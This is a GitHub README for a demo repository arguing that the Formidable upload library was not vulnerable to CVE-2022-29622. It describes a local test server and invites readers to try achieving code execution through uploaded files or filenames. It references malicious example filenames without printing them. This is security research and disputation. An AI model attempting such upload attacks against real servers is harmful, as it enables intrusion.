Skip to content

keymandll/CVE-2022-29622

BranchesTags

Repository files navigation

CVE-2022–29622: (In)vulnerability Analysis

This codebase was created to help security professionals and developers to understand why I think Formidable was not vulnerable to CVE-2022-29622. I have written up my analysis here: CVE-2022–29622: (In)vulnerability Analysis

As some did not understand it, I thought I will illustrate my point using actual, running code.

The Server

The server is implemented in index.mjs. It uses Formidable version 3.1.4 to upload any file of your choosing.

I explicitly configured Formidable as shown below:

{
      uploadDir: './uploads/',
      keepExtensions: true,
    }

This way, all files will be uploaded to the uploads directory. I have enabled keepExtension so you can get your files with a malicious filename uploaded.

Starting the Server

To set up and start the server, issue the following commands from this directory:

npm install
npm run start

The first command installs all dependencies, including the appropriate version of formidable. The second command will start the server.

Once up and running, you can access the file upload form exposed by the server at: http://127.0.0.1:3000/

Upload a Malicious File

I have included two files with malicious name in the examples directory... as examples.

Files submitted using the form at http://127.0.0.1:3000 will get uploaded to the uploads directory.

CHALLENGE

The challenge is to see if you can prove that formidable is vulnerable to CVE-2022–29622. To be able to do that, you have to get this web server to execute code that you include in the uploaded file or in the name of the file.

The rules:

  1. You are allowed to put your malicious payload in the file or within the file's name. (Similar to the examples I have provided.)
  2. You are allowed to tamper with parts of the HTTP request that are related to file upload. (e.g.: multipart body, content-type, boundary string)
  3. The only acceptable attack surface is port 3000. You MUST NOT modify any files within this directory.

If you can get arbitrary code executed by strictly following the above rules, only then you have proved that formidable was vulnerable to arbitrary code execution.

Suggestion: Probably the simplest visual demostration would be to get the server to print out a string, for example, "I'm awesome, I've got arbitrary code executed" on the console where you started the web server.

About

Hack this service to prove CVE-2022–29622 is valid

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages